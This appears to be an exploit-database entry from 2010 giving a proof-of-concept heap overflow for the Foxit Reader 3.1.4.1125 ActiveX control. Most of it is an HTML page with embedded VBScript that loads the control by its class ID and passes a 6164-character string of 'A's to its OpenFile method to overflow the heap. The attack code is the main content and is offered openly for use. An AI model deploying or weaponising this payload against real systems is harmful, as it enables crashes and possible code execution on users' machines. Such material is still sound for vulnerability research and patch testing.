Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow (PoC)



EKU-ID: 18556 CVE: OSVDB-74315 OSVDB-ID:
Author: SarBoT511 & D3V!L FUCKER Published: 2010-01-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#Vendor :www.foxitsoftware.com
#tested on :[windows 7]
#Foxit Reader Version 3.1.4.1125

<html>
<object classid='clsid:05563215-225C-45EB-BB34-AFA47217B1DE' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderOCX.ocx"
prototype  = "Function OpenFile ( ByVal strFilePath As String ) As Boolean"
memberName = "OpenFile"
progid     = "FOXITREADEROCXLib.FoxitReaderOCX"
argCount   = 1

arg1=String(6164, "A")

target.OpenFile arg1

</script>